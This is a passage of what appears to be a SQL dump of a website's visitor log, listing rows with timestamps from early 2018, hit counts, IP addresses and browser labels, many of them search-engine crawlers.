1519778313,1,1,0,0,'54.36.148.179','other'),(213715,1519778379,1,1,0,0,'54.36.148.191','other'),(213716,1519778380,1,1,0,0,'91.209.51.22','other'),(213717,1519778705,1,1,0,0,'54.36.148.186','other'),(213718,1519779456,1,1,0,0,'141.8.142.74','other'),(213719,1519779462,1,1,0,0,'46.161.9.56','chrome'),(213720,1519779787,1,1,0,0,'54.36.148.162','other'),(213721,1519780014,1,1,0,0,'54.36.148.157','other'),(213722,1519780151,1,0,1,0,'66.249.66.157',''),(213723,1519780334,1,1,0,0,'54.36.148.181','other'),(213724,1519780583,1,1,0,0,'54.36.148.188','other'),(213725,1519780675,1,1,0,0,'54.36.148.253','other'),(213726,1519781017,1,1,0,0,'54.36.149.48','other'),(213727,1519781817,1,0,1,0,'66.249.66.157',''),(213728,1519781916,1,1,0,0,'66.249.66.155','chrome'),(213729,1519781917,1,1,0,0,'66.249.66.76','chrome'),(213730,1519781925,1,1,0,0,'54.36.148.142','other'),(213731,1519781960,2,0,2,0,'66.249.66.156',''),(213732,1519782064,1,1,0,0,'54.36.148.23','other'),(213733,1519782462,1,1,0,0,'54.36.148.152','other'),(213734,1519782555,1,0,1,0,'66.249.66.75',''),(213735,1519782650,1,1,0,0,'141.8.132.19','other'),(213736,1519783174,1,1,0,0,'207.46.13.108','other'),(213737,1519783285,1,1,0,0,'54.36.148.74','other'),(213738,1519783638,2,0,2,0,'66.249.66.157',''),(213739,1519783649,1,0,1,0,'66.249.66.156',''),(213740,1519783653,1,1,0,0,'54.36.148.107','other'),(213741,1519783662,12,0,12,0,'66.249.66.155',''),(213742,1519783709,3,1,2,0,'66.249.66.155',''),(213743,1519783913,1,1,0,0,'8.29.198.25','other'),(213744,1519783957,1,1,0,0,'66.249.66.157','chrome'),(213745,1519784249,1,1,0,0,'87.250.224.46','other'),(213746,1519784293,2,2,0,0,'66.249.66.156','chrome'),(213747,1519784296,1,1,0,0,'54.36.148.225','other'),(213748,1519784488,1,1,0,0,'54.36.148.179','other'),(213749,1519784670,1,1,0,0,'54.36.148.127','other'),(213750,1519784722,1,1,0,0,'54.36.149.81','other'),(213751,1519784736,1,1,0,0,'207.46.13.42','other'),(213752,1519784823,1,1,0,0,'54.36.148.243','other'),(213753,1519785288,2,2,0,0,'66.249.66.155','chrome'),(213754,1519785373,1,0,1,0,'66.249.66.156',''),(213755,1519785467,1,1,0,0,'54.36.148.159','other'),(213756,1519785615,1,1,0,0,'207.46.13.104','other'),(213757,1519785624,1,1,0,0,'54.36.148.53','other'),(213758,1519786086,1,1,0,0,'54.36.149.24','other'),(213759,1519786185,1,1,0,0,'207.46.13.108','other'),(213760,1519786291,1,1,0,0,'54.36.148.37','other'),(213761,1519786343,1,1,0,0,'66.249.66.156','chrome'),(213762,1519786516,1,1,0,0,'46.161.9.56','chrome'),(213763,1519786642,1,1,0,0,'54.36.149.106','other'),(213764,1519787108,1,1,0,0,'54.36.149.107','other'),(213765,1519787427,1,1,0,0,'54.36.149.68','other'),(213766,1519787735,1,1,0,0,'54.36.148.103','other'),(213767,1519788001,1,0,1,0,'66.249.66.157',''),(213768,1519788256,1,1,0,0,'54.36.148.126','other'),(213769,1519788326,1,1,0,0,'54.36.148.139','other'),(213770,1519789164,1,1,0,0,'141.8.142.74','other'),(213771,1519789328,1,1,0,0,'178.154.171.88','other'),(213772,1519790192,1,1,0,0,'54.36.148.229','other'),(213773,1519790243,1,1,0,0,'54.36.148.92','other'),(213774,1519790438,1,1,0,0,'54.36.148.242','other'),(213775,1519791260,1,1,0,0,'54.36.149.26','other'),(213776,1519791307,1,1,0,0,'54.36.148.87','other'),(213777,1519791835,7,7,0,0,'141.8.142.74','other'),(213778,1519792000,1,1,0,0,'54.36.148.33','other'),(213779,1519792008,1,1,0,0,'54.36.148.204','other'),(213780,1519792043,1,0,1,0,'66.249.66.156',''),(213781,1519792047,1,1,0,0,'66.249.66.76','chrome'),(213782,1519792048,1,1,0,0,'66.249.66.156','chrome'),(213783,1519792204,1,1,0,0,'54.36.149.28','other'),(213784,1519792425,1,1,0,0,'87.250.224.46','other'),(213785,1519792477,1,1,0,0,'37.9.113.115','other'),(213786,1519793077,1,1,0,0,'141.8.142.74','other'),(213787,1519793236,1,0,1,0,'66.249.66.155',''),(213788,1519793471,1,1,0,0,'54.36.148.254','other'),(213789,1519793637,1,1,0,0,'54.36.148.14','other'),(213790,1519793679,1,1,0,0,'54.36.148.152','other'),(213791,1519794625,1,1,0,0,'54.36.148.15','other'),(213792,1519794776,1,1,0,0,'8.29.198.27','other'),(213793,1519794830,1,1,0,0,'54.36.148.57','other'),(213794,1519794904,1,1,0,0,'54.36.148.132','other'),(213795,1519794911,2,0,2,0,'66.249.66.155',''),(213796,1519795240,1,1,0,0,'54.36.149.40','other'),(213797,1519795438,1,1,0,0,'54.36.148.63','other'),(213798,1519796113,1,1,0,0,'54.36.149.101','other'),(213799,1519796139,1,1,0,0,'54.36.148.239','other'),(213800,1519796236,1,1,0,0,'54.36.149.43','other'),(213801,1519796512,1,1,0,0,'54.36.148.219','other'),(213802,1519796535,1,1,0,0,'87.250.224.46','other'),(213803,1519796764,1,1,0,0,'54.36.148.223','other'),(213804,1519797299,1,1,0,0,'71.13.112.152','opera'),(213805,1519797318,1,1,0,0,'5.196.131.250','opera'),(213806,1519797322,1,1,0,0,'58.11.64.5','opera'),(213807,1519797339,1,1,0,0,'54.36.148.240','other'),(213808,1519797345,1,1,0,0,'90.112.166.128','msie'),(213809,1519797353,1,1,0,0,'94.41.220.147','opera'),(213810,1519797357,1,1,0,0,'94.41.220.147','other'),(213811,1519797361,1,1,0,0,'94.114.161.88','other'),(213812,1519797366,1,1,0,0,'90.24.91.64','msie'),(213813,1519797367,1,1,0,0,'50.233.136.254','chrome'),(213814,1519797380,1,1,0,0,'50.233.136.254','opera'),(213815,1519797383,1,1,0,0,'12.221.240.25','chrome'),(213816,1519797390,1,1,0,0,'177.250.36.120','msie'),(213817,1519797411,1,1,0,0,'50.233.136.254','msie'),(213818,1519797422,1,1,0,0,'151.106.17.174','chrome'),(213819,1519797436,1,1,0,0,'54.36.149.67','other'),(213820,1519797458,1,1,0,0,'151.106.17.173','chrome'),(213821,1519797462,1,1,0,0,'94.41.220.147','firefox'),(213822,1519797479,1,1,0,0,'34.200.225.101','firefox'),(213823,1519797507,1,1,0,0,'34.200.233.85','other'),(213824,1519797626,1,1,0,0,'34.201.10.250','other'),(213825,1519797664,1,1,0,0,'183.89.22.140','opera'),(213826,1519797722,1,1,0,0,'182.53.14.188','opera'),(213827,1519797936,1,0,1,0,'66.249.66.157',''),(213828,1519798333,1,1,0,0,'66.249.66.75','chrome'),(213829,1519798335,1,1,0,0,'66.249.66.157','chrome'),(213830,1519798678,1,1,0,0,'141.8.142.74','other'),(213831,1519799155,1,1,0,0,'54.36.148.242','other'),(213832,1519799175,2,2,0,0,'78.111.190.82','chrome'),(213833,1519799198,1,0,1,0,'66.249.66.155',''),(213834,1519799305,1,1,0,0,'207.46.13.104','other'),(213835,1519799769,1,1,0,0,'54.36.148.220','other'),(213836,1519799851,1,1,0,0,'77.111.244.35','chrome'),(213837,1519800094,1,1,0,0,'54.36.148.249','other'),(213838,1519800496,1,0,1,0,'66.249.66.157',''),(213839,1519800959,2,2,0,0,'91.196.178.77','chrome'),(213840,1519801150,1,1,0,0,'54.36.148.224','other'),(213841,1519801154,1,1,0,0,'91.209.11.236','other'),(213842,1519801414,1,1,0,0,'180.76.15.29','other'),(213843,1519801460,1,1,0,0,'54.36.149.31','other'),(213844,1519801706,1,1,0,0,'54.36.148.222','other'),(213845,1519802085,1,1,0,0,'66.249.66.76','chrome'),(213846,1519802091,1,1,0,0,'95.132.93.99','firefox'),(213847,1519802099,2,1,1,0,'66.249.66.155',''),(213848,1519802234,1,1,0,0,'54.36.149.55','other'),(213849,1519802367,1,1,0,0,'54.36.148.196','other'),(213850,1519802968,1,1,0,0,'54.36.148.214','other'),(213851,1519803154,1,1,0,0,'91.196.178.77','firefox'),(213852,1519803290,1,1,0,0,'54.36.149.80','other'),(213853,1519803485,1,1,0,0,'54.36.148.74','other'),(213854,1519803867,1,1,0,0,'91.196.178.68','chrome'),(213855,1519804158,1,1,0,0,'54.36.148.205','other'),(213856,1519804173,1,1,0,0,'54.36.148.250','other'),(213857,1519804198,1,1,0,0,'54.36.149.101','other'),(213858,1519804237,2,0,2,0,'66.249.66.157',''),(213859,1519804385,1,1,0,0,'54.36.148.251','other'),(213860,1519804402,1,1,0,0,'54.36.149.99','other'),(213861,1519804665,1,1,0,0,'54.36.148.183','other'),(213862,1519805049,1,0,1,0,'66.249.66.156',''),(213863,1519805159,1,1,0,0,'54.36.148.230','other'),(213864,1519805641,1,1,0,0,'8.29.198.27','other'),(213865,1519805655,1,1,0,0,'130.180.217.127','chrome'),(213866,1519805779,2,2,0,0,'31.43.31.222','chrome'),(213867,1519805977,1,1,0,0,'91.196.178.169','chrome'),(213868,1519806767,1,0,1,0,'66.249.66.157',''),(213869,1519806802,1,1,0,0,'54.36.149.86','other'),(213870,1519807052,2,0,2,0,'66.249.66.155',''),(213871,1519807427,1,0,1,0,'66.249.66.156',''),(213872,1519807475,2,2,0,0,'91.196.178.86','chrome'),(213873,1519808012,2,2,0,0,'91.196.178.161','chrome'),(213874,1519808728,2,2,0,0,'77.111.244.28','chrome'),(213875,1519808869,1,1,0,0,'188.235.23.160','chrome'),(213876,1519809044,1,1,0,0,'54.36.148.216','other'),(213877,1519809286,3,3,0,0,'141.8.142.74','other'),(213878,1519809289,1,1,0,0,'54.36.148.38','other'),(213879,1519809385,1,1,0,0,'54.36.148.161','other'),(213880,1519809437,3,0,3,0,'66.249.66.157',''),(213881,1519809507,1,1,0,0,'178.92.158.152','chrome'),(213882,1519809532,1,1,0,0,'188.231.244.35','chrome'),(213883,1519809577,1,1,0,0,'54.36.148.106','other'),(213884,1519809606,1,1,0,0,'54.36.148.186','other'),(213885,1519809833,1,1,0,0,'54.36.148.48','other'),(213886,1519810058,8,8,0,0,'178.203.120.211','other'),(213887,1519810410,1,1,0,0,'180.76.15.25','other'),(213888,1519810529,1,0,1,0,'66.249.66.155',''),(213889,1519810604,1,0,1,0,'66.249.66.156',''),(213890,1519810807,1,1,0,0,'54.36.148.138','other'),(213891,1519811013,1,1,0,0,'54.36.148.238','other'),(213892,1519811014,1,1,0,0,'141.8.142.74','other'),(213893,1519811066,1,1,0,0,'54.36.148.78','other'),(213894,1519811250,1,1,0,0,'54.36.148.109','other'),(213895,1519811357,1,1,0,0,'66.249.66.156','chrome'),(213896,1519811394,1,1,0,0,'91.196.178.169','other'),(213897,1519811481,2,2,0,0,'91.196.178.86','chrome'),(213898,1519811822,1,1,0,0,'54.36.148.21','other'),(213899,1519811878,1,0,1,0,'66.249.66.76',''),(213900,1519811903,1,1,0,0,'54.36.149.68','other'),(213901,1519812656,16,16,0,0,'88.198.55.175','other'),(213902,1519812698,1,1,0,0,'141.8.142.74','other'),(213903,1519812760,1,1,0,0,'130.180.219.249','chrome'),(213904,1519813025,1,0,1,0,'66.249.66.74',''),(213905,1519813060,1,1,0,0,'54.36.149.3','other'),(213906,1519813068,1,0,1,0,'66.249.66.155',''),(213907,1519813166,1,1,0,0,'157.55.39.220','other'),(213908,1519813494,1,1,0,0,'54.36.148.215','other'),(213909,1519813730,1,1,0,0,'54.36.148.111','other'),(213910,1519813763,1,1,0,0,'54.36.148.131','other'),(213911,1519814140,1,1,0,0,'141.8.142.74','other'),(213912,1519814145,1,1,0,0,'54.36.148.198','other'),(213913,1519814478,1,1,0,0,'54.36.148.103','other'),(213914,1519815052,1,0,1,0,'66.249.66.76',''),(213915,1519815077,1,0,1,0,'66.249.66.156',''),(213916,1519815164,1,1,0,0,'66.249.66.76','chrome'),(213917,1519815406,1,1,0,0,'54.36.148.92','other'),(213918,1519815501,1,1,0,0,'178.92.158.152','chrome'),(213919,1519815532,1,1,0,0,'134.249.147.14','chrome'),(213920,1519816441,2,2,0,0,'91.196.177.46','firefox'),(213921,1519816496,1,1,0,0,'8.29.198.26','other'),(213922,1519816672,1,1,0,0,'95.158.53.244','chrome'),(213923,1519817154,1,1,0,0,'54.36.148.106','other'),(213924,1519817190,2,1,1,0,'66.249.66.156',''),(213925,1519817760,1,1,0,0,'54.36.148.117','other'),(213926,1519817993,1,1,0,0,'54.36.148.247','other'),(213927,1519818980,1,1,0,0,'141.8.142.74','other'),(213928,1519819109,1,1,0,0,'178.154.171.88','other'),(213929,1519819680,1,1,0,0,'66.249.66.156','chrome'),(213930,1519820004,1,1,0,0,'195.230.129.94','chrome'),(213931,1519820057,1,1,0,0,'54.36.148.222','other'),(213932,1519820799,1,1,0,0,'77.222.134.101','other'),(213933,1519820881,1,1,0,0,'157.55.39.220','other'),(213934,1519820892,2,2,0,0,'91.196.178.86','chrome'),(213935,1519821734,2,2,0,0,'130.180.219.249','chrome'),(213936,1519821869,1,1,0,0,'54.36.148.200','other'),(213937,1519822063,1,0,1,0,'66.249.66.155',''),(213938,1519822090,1,1,0,0,'141.8.142.74','other'),(213939,1519822143,1,1,0,0,'77.111.244.42','chrome'),(213940,1519822539,1,1,0,0,'54.36.148.228','other'),(213941,1519822567,1,1,0,0,'54.36.148.247','other'),(213942,1519822573,1,1,0,0,'91.209.11.236','other'),(213943,1519822738,1,1,0,0,'54.36.149.51','other'),(213944,1519823535,1,1,0,0,'94.179.46.77','chrome'),(213945,1519824300,1,1,0,0,'54.36.148.37','other'),(213946,1519824948,1,1,0,0,'54.36.148.193','other'),(213947,1519824967,1,1,0,0,'66.249.66.74','chrome'),(213948,1519825658,1,1,0,0,'207.46.13.42','other'),(213949,1519825696,1,1,0,0,'54.36.149.62','other'),(213950,1519825853,1,1,0,0,'54.36.148.57','other'),(213951,1519826458,1,1,0,0,'54.36.148.114','other'),(213952,1519826612,1,1,0,0,'54.36.148.218','other'),(213953,1519826977,1,1,0,0,'54.36.148.211','other'),(213954,1519827347,1,1,0,0,'8.29.198.27','other'),(213955,1519827463,1,1,0,0,'193.239.238.4','chrome'),(213956,1519827839,1,1,0,0,'188.166.109.45','chrome'),(213957,1519827855,1,1,0,0,'91.196.178.104','chrome'),(213958,1519828058,1,1,0,0,'54.36.148.109','other'),(213959,1519828206,1,1,0,0,'194.247.172.15','chrome'),(213960,1519828336,1,1,0,0,'46.211.6.30','other'),(213961,1519828634,1,1,0,0,'91.196.177.93','chrome'),(213962,1519828818,1,1,0,0,'195.64.136.162','chrome'),(213963,1519828981,1,1,0,0,'54.36.149.65','other'),(213964,1519829030,1,1,0,0,'54.36.148.202','other'),(213965,1519829100,1,1,0,0,'54.36.148.103','other'),(213966,1519829140,1,1,0,0,'207.46.13.42','other'),(213967,1519829335,1,1,0,0,'54.36.148.30','other'),(213968,1519829410,1,0,1,0,'66.249.66.157',''),(213969,1519829495,1,0,1,0,'66.249.66.156',''),(213970,1519829537,1,1,0,0,'178.154.171.88','other'),(213971,1519829612,1,1,0,0,'54.36.148.72','other'),(213972,1519829616,1,1,0,0,'151.80.33.36','other'),(213973,1519829686,1,1,0,0,'54.36.148.118','other'),(213974,1519829691,1,1,0,0,'66.249.66.155','chrome'),(213975,1519829887,1,1,0,0,'91.196.178.65','chrome'),(213976,1519829981,1,1,0,0,'77.121.201.93','firefox'),(213977,1519830173,1,1,0,0,'54.36.148.47','other'),(213978,1519830393,1,1,0,0,'188.230.43.254','other'),(213979,1519830954,1,1,0,0,'54.36.148.128','other'),(213980,1519830971,1,1,0,0,'31.193.91.80','chrome'),(213981,1519831296,1,1,0,0,'91.196.178.73','firefox'),(213982,1519831798,1,1,0,0,'87.250.224.46','other'),(213983,1519831802,1,1,0,0,'141.8.142.74','other'),(213984,1519831892,1,1,0,0,'77.111.244.34','chrome'),(213985,1519832440,1,1,0,0,'54.36.148.232','other'),(213986,1519832543,1,1,0,0,'66.249.66.74','chrome'),(213987,1519832589,1,1,0,0,'91.209.11.236','other'),(213988,1519832828,1,1,0,0,'54.36.148.229','other'),(213989,1519832892,1,1,0,0,'54.36.149.56','other'),(213990,1519832958,1,1,0,0,'54.36.148.206','other'),(213991,1519832974,1,1,0,0,'188.230.43.254','other'),(213992,1519833080,1,1,0,0,'54.36.148.102','other'),(213993,1519833574,1,1,0,0,'54.36.149.1','other'),(213994,1519834176,1,1,0,0,'87.244.147.11','chrome'),(213995,1519834349,1,1,0,0,'66.249.66.157','chrome'),(213996,1519834484,6,6,0,0,'92.113.188.43','chrome'),(213997,1519834746,1,1,0,0,'54.36.148.97','other'),(213998,1519835126,1,1,0,0,'54.36.148.198','other'),(213999,1519835374,1,1,0,0,'188.230.43.254','other'),(214000,1519835416,1,1,0,0,'207.46.13.108','other'),(214001,1519835500,1,1,0,0,'54.36.149.14','other'),(214002,1519835670,1,1,0,0,'54.36.148.73','other'),(214003,1519836084,1,1,0,0,'95.132.5.6','firefox'),(214004,1519836222,1,1,0,0,'54.36.148.48','other'),(214005,1519836800,1,1,0,0,'54.36.149.32','other'),(214006,1519837257,1,1,0,0,'95.132.5.6','firefox'),(214007,1519837328,1,1,0,0,'91.196.178.25','chrome'),(214008,1519837378,1,0,1,0,'66.249.66.156',''),(214009,1519837678,1,1,0,0,'54.36.149.48','other'),(214010,1519837778,1,1,0,0,'188.230.43.254','other'),(214011,1519837896,1,1,0,0,'54.36.149.2','other'),(214012,1519838192,1,1,0,0,'54.36.148.104','other'),(214013,1519838258,1,1,0,0,'8.29.198.26','other'),(214014,1519838296,1,1,0,0,'54.36.148.29','other'),(214015,1519838299,1,1,0,0,'95.132.5.6','firefox'),(214016,1519838632,1,1,0,0,'54.36.149.25','other'),(214017,1519838750,1,1,0,0,'54.36.148.139','other'),(214018,1519838818,1,1,0,0,'54.36.149.75','other'),(214019,1519838974,1,1,0,0,'54.36.148.251','other'),(214020,1519839864,1,1,0,0,'91.196.178.162','chrome'),(214021,1519840180,1,1,0,0,'188.230.43.254','other'),(214022,1519840253,1,1,0,0,'54.36.149.52','other'),(214023,1519840650,1,1,0,0,'141.8.142.74','other'),(214024,1519840798,1,1,0,0,'91.209.11.236','other'),(214025,1519840859,1,1,0,0,'54.36.148.193','other'),(214026,1519841025,1,1,0,0,'54.36.149.60','other'),(214027,1519841067,1,1,0,0,'37.144.153.108','msie'),(214028,1519841439,1,1,0,0,'54.36.148.178','other'),(214029,1519841484,1,1,0,0,'94.179.208.111','other'),(214030,1519841714,1,1,0,0,'54.36.149.74','other'),(214031,1519841769,1,1,0,0,'54.36.148.203','other'),(214032,1519841777,1,1,0,0,'54.36.149.100','other'),(214033,1519841781,1,1,0,0,'54.36.148.168','other'),(214034,1519841806,1,1,0,0,'157.55.39.121','other'),(214035,1519841918,1,0,1,0,'66.249.66.156',''),(214036,1519841955,1,1,0,0,'180.76.15.32','other'),(214037,1519842041,1,1,0,0,'66.249.66.74','chrome'),(214038,1519842066,1,1,0,0,'66.249.66.156','chrome'),(214039,1519842387,1,1,0,0,'54.36.149.35','other'),(214040,1519842497,1,1,0,0,'94.179.208.111','other'),(214041,1519842576,1,1,0,0,'188.230.43.254','other'),(214042,1519842581,1,1,0,0,'54.36.148.215','other'),(214043,1519842610,1,1,0,0,'54.36.148.192','other'),(214044,1519842766,1,1,0,0,'54.36.148.68','other'),(214045,1519842799,1,0,1,0,'66.249.66.157',''),(214046,1519842941,2,0,2,0,'66.249.66.155',''),(214047,1519843155,1,0,1,0,'66.249.66.156',''),(214048,1519843496,1,1,0,0,'54.36.149.104','other'),(214049,1519843548,1,1,0,0,'91.196.178.73','firefox'),(214050,1519843786,1,1,0,0,'178.154.171.88','other'),(214051,1519844001,1,1,0,0,'54.36.149.38','other'),(214052,1519844292,1,1,0,0,'54.36.148.152','other'),(214053,1519844708,1,1,0,0,'66.249.66.157','chrome'),(214054,1519845362,1,1,0,0,'54.36.149.70','other'),(214055,1519845413,1,1,0,0,'144.76.8.134','other'),(214056,1519845414,1,1,0,0,'31.202.193.180','chrome'),(214057,1519845416,1,1,0,0,'54.36.149.22','other'),(214058,1519845549,1,1,0,0,'54.36.149.33','other'),(214059,1519845591,1,1,0,0,'54.36.149.55','other'),(214060,1519845733,1,1,0,0,'54.36.149.107','other'),(214061,1519845809,3,0,3,0,'66.249.66.156',''),(214062,1519845992,1,1,0,0,'94.179.208.111','other'),(214063,1519846018,2,0,2,0,'66.249.66.155',''),(214064,1519846227,2,2,0,0,'91.196.178.17','chrome'),(214065,1519846899,1,1,0,0,'54.36.148.76','other'),(214066,1519847920,1,1,0,0,'54.36.148.146','other'),(214067,1519847948,1,0,1,0,'66.249.66.74',''),(214068,1519848107,1,1,0,0,'54.36.148.143','other'),(214069,1519848209,1,1,0,0,'178.154.171.88','other'),(214070,1519848231,1,1,0,0,'66.249.66.75','chrome'),(214071,1519848235,1,1,0,0,'66.249.66.155','chrome'),(214072,1519848395,1,1,0,0,'54.36.148.90','other'),(214073,1519848488,1,1,0,0,'54.36.148.212','other'),(214074,1519848639,1,1,0,0,'141.8.142.74','other'),(214075,1519848712,2,0,2,0,'66.249.66.156',''),(214076,1519848975,1,1,0,0,'54.36.148.63','other'),(214077,1519849136,1,1,0,0,'8.29.198.27','other'),(214078,1519849754,1,1,0,0,'54.36.149.64','other'),(214079,1519850164,1,1,0,0,'207.46.13.108','other'),(214080,1519851960,2,2,0,0,'91.196.178.17','chrome'),(214081,1519856497,1,0,1,0,'66.249.66.157',''),(214082,1519857298,1,1,0,0,'178.154.171.88','other'),(214083,1519859991,1,1,0,0,'8.29.198.27','other'),(214084,1519860224,1,1,0,0,'120.132.52.169','chrome'),(214085,1519860493,1,1,0,0,'91.196.178.161','chrome'),(214086,1519861148,1,0,1,0,'66.249.66.157',''),(214087,1519862574,1,0,1,0,'66.249.66.157',''),(214088,1519863537,2,2,0,0,'216.244.66.237','other'),(214089,1519863582,1,0,1,0,'66.249.66.75',''),(214090,1519863612,1,0,1,0,'66.249.66.76',''),(214091,1519864451,1,1,0,0,'141.8.142.74','other'),(214092,1519865107,1,1,0,0,'199.58.86.209','other'),(214093,1519865579,1,1,0,0,'66.249.66.75','chrome'),(214094,1519865581,1,1,0,0,'66.249.66.156','chrome'),(214095,1519866084,1,1,0,0,'141.8.142.74','other'),(214096,1519866109,1,0,1,0,'66.249.66.76',''),(214097,1519866506,1,1,0,0,'5.9.88.103','other'),(214098,1519867091,1,1,0,0,'144.76.29.66','other'),(214099,1519867967,1,1,0,0,'141.8.142.74','other'),(214100,1519868262,1,0,1,0,'66.249.66.155',''),(214101,1519869053,2,0,2,0,'66.249.66.156',''),(214102,1519869074,1,1,0,0,'216.244.66.237','other'),(214103,1519869293,1,1,0,0,'141.8.142.74','other'),(214104,1519870669,2,0,2,0,'66.249.66.156',''),(214105,1519870843,1,1,0,0,'8.29.198.25','other'),(214106,1519871628,2,2,0,0,'141.8.142.74','other'),(214107,1519872068,1,1,0,0,'66.249.66.75','chrome'),(214108,1519872091,1,1,0,0,'66.249.66.156','chrome'),(214109,1519872470,1,0,1,0,'66.249.66.157',''),(214110,1519873032,1,1,0,0,'157.55.39.121','other'),(214111,1519873509,2,0,2,0,'66.249.66.156',''),(214112,1519873521,1,1,0,0,'141.8.142.74','other'),(214113,1519873685,1,0,1,0,'66.249.66.157',''),(214114,1519874209,2,2,0,0,'40.77.167.60','other'),(214115,1519874774,1,1,0,0,'207.46.13.55','other'),(214116,1519875068,1,1,0,0,'5.9.61.111','other'),(214117,1519875193,2,0,2,0,'66.249.66.155',''),(214118,1519875246,1,0,1,0,'66.249.66.76',''),(214119,1519875765,1,1,0,0,'216.244.66.237','other'),(214120,1519877155,2,0,2,0,'66.249.66.157',''),(214121,1519877552,1,1,0,0,'66.249.66.156','chrome'),(214122,1519877668,1,1,0,0,'66.249.66.74','chrome'),(214123,1519878737,1,1,0,0,'178.154.171.88','other'),(214124,1519880467,1,1,0,0,'46.219.220.223','chrome'),(214125,1519881702,1,1,0,0,'8.29.198.26','other'),(214126,1519881804,2,2,0,0,'37.55.59.18','chrome'),(214127,1519881966,1,1,0,0,'77.127.33.36','chrome'),(214128,1519882528,3,3,0,0,'147.135.128.113','other'),(214129,1519882561,1,1,0,0,'37.9.113.60','other'),(214130,1519882564,1,1,0,0,'141.8.142.29','other'),(214131,1519882724,1,1,0,0,'37.73.196.25','chrome'),(214132,1519883353,1,1,0,0,'95.221.220.31','msie'),(214133,1519883402,1,1,0,0,'37.9.113.56','other'),(214134,1519883481,1,1,0,0,'178.154.200.32','other'),(214135,1519883759,1,1,0,0,'188.32.230.241','msie'),(214136,1519883905,47,47,0,0,'147.135.128.113','other'),(214137,1519884600,1,1,0,0,'47.205.158.141','other'),(214138,1519884808,64,64,0,0,'147.135.128.113','other'),(214139,1519885002,1,1,0,0,'216.244.66.237','other'),(214140,1519885231,1,1,0,0,'77.111.244.21','chrome'),(214141,1519886069,1,1,0,0,'37.9.113.182','other'),(214142,1519886471,2,1,1,0,'66.249.66.76',''),(214143,1519886483,1,1,0,0,'95.134.97.244','chrome'),(214144,1519886809,1,0,1,0,'66.249.66.156',''),(214145,1519886991,2,2,0,0,'91.196.178.70','chrome'),(214146,1519887154,1,0,1,0,'66.249.66.155',''),(214147,1519888423,1,1,0,0,'37.9.113.56','other'),(214148,1519888567,1,0,1,0,'66.249.66.157',''),(214149,1519888968,1,0,1,0,'66.249.66.75',''),(214150,1519889368,1,1,0,0,'91.196.178.161','chrome'),(214151,1519890181,1,1,0,0,'95.132.2.25','firefox'),(214152,1519890433,2,0,2,0,'66.249.66.155',''),(214153,1519890594,1,1,0,0,'91.224.96.176','chrome'),(214154,1519891379,1,1,0,0,'78.111.190.185','chrome'),(214155,1519892162,1,1,0,0,'216.244.66.237','other'),(214156,1519892256,1,0,1,0,'66.249.66.76',''),(214157,1519892739,1,1,0,0,'8.29.198.26','other'),(214158,1519893216,2,0,2,0,'66.249.66.155',''),(214159,1519893258,2,2,0,0,'46.200.197.155','chrome'),(214160,1519893611,1,1,0,0,'192.151.157.210','other'),(214161,1519893902,2,0,2,0,'66.249.66.157',''),(214162,1519894080,1,1,0,0,'178.154.171.88','other'),(214163,1519894117,1,1,0,0,'95.134.96.25','firefox'),(214164,1519894200,3,3,0,0,'91.196.178.69','chrome'),(214165,1519894207,1,1,0,0,'95.132.2.25','firefox'),(214166,1519894532,1,0,1,0,'66.249.66.156',''),(214167,1519894540,1,1,0,0,'46.200.197.155','chrome'),(214168,1519895570,1,1,0,0,'66.249.66.156','chrome'),(214169,1519895645,2,2,0,0,'91.196.177.46','chrome'),(214170,1519895795,1,1,0,0,'66.249.66.155','chrome'),(214171,1519895955,1,1,0,0,'91.196.178.104','chrome'),(214172,1519896149,1,1,0,0,'141.8.142.74','other'),(214173,1519896297,2,2,0,0,'78.111.190.185','chrome'),(214174,1519896361,1,1,0,0,'185.126.254.24','firefox'),(214175,1519896575,1,0,1,0,'66.249.66.157',''),(214176,1519897025,1,1,0,0,'91.196.178.132','chrome'),(214177,1519897456,1,1,0,0,'66.249.66.74','chrome'),(214178,1519897721,1,1,0,0,'185.126.254.24','firefox'),(214179,1519898238,1,1,0,0,'37.53.168.17','chrome'),(214180,1519898391,1,0,1,0,'66.249.66.76',''),(214181,1519898431,1,1,0,0,'94.179.228.66','msie'),(214182,1519898515,1,1,0,0,'141.8.142.74','other'),(214183,1519899693,1,0,1,0,'66.249.66.156',''),(214184,1519899779,1,0,1,0,'66.249.66.155',''),(214185,1519900502,1,1,0,0,'91.196.177.46','chrome'),(214186,1519900565,1,1,0,0,'89.24.48.79','chrome'),(214187,1519900790,1,1,0,0,'213.87.160.74','other'),(214188,1519901063,1,0,1,0,'66.249.66.155',''),(214189,1519901442,1,1,0,0,'95.46.160.252','chrome'),(214190,1519901813,1,1,0,0,'141.8.142.74','other'),(214191,1519901935,2,2,0,0,'130.180.216.53','chrome'),(214192,1519902237,1,1,0,0,'91.196.177.110','chrome'),(214193,1519902506,1,0,1,0,'66.249.66.155',''),(214194,1519902640,1,1,0,0,'66.249.66.155','chrome'),(214195,1519902771,1,1,0,0,'77.111.244.18','chrome'),(214196,1519903426,1,0,1,0,'66.249.66.156',''),(214197,1519903621,1,1,0,0,'141.8.142.74','other'),(214198,1519903624,1,1,0,0,'8.29.198.26','other'),(214199,1519904228,2,2,0,0,'91.196.179.25','chrome'),(214200,1519904309,1,1,0,0,'180.76.15.137','other'),(214201,1519905523,1,0,1,0,'66.249.66.155',''),(214202,1519905708,1,1,0,0,'91.196.178.130','firefox'),(214203,1519905751,1,1,0,0,'66.249.66.76','chrome'),(214204,1519906551,1,1,0,0,'141.8.142.74','other'),(214205,1519906899,1,1,0,0,'207.46.13.55','other'),(214206,1519907148,1,0,1,0,'66.249.66.157',''),(214207,1519907278,3,3,0,0,'91.196.177.15','chrome'),(214208,1519907389,2,2,0,0,'91.196.178.73','chrome'),(214209,1519907508,1,1,0,0,'46.161.9.39','chrome'),(214210,1519907787,1,1,0,0,'66.249.66.156','chrome'),(214211,1519907865,1,1,0,0,'141.8.142.74','other'),(214212,1519908178,1,1,0,0,'192.162.242.10','chrome'),(214213,1519909195,2,2,0,0,'91.196.178.17','chrome'),(214214,1519909644,1,1,0,0,'141.8.142.74','other'),(214215,1519910034,2,2,0,0,'91.196.178.162','chrome'),(214216,1519910062,1,0,1,0,'66.249.66.74',''),(214217,1519910287,1,1,0,0,'178.154.171.88','other'),(214218,1519910419,1,1,0,0,'92.113.54.218','chrome'),(214219,1519910444,1,0,1,0,'66.249.66.76',''),(214220,1519910447,1,1,0,0,'52.14.111.50','chrome'),(214221,1519910505,1,1,0,0,'91.196.178.104','chrome'),(214222,1519910654,1,0,1,0,'66.249.66.155',''),(214223,1519911045,1,1,0,0,'91.196.177.15','chrome'),(214224,1519911085,1,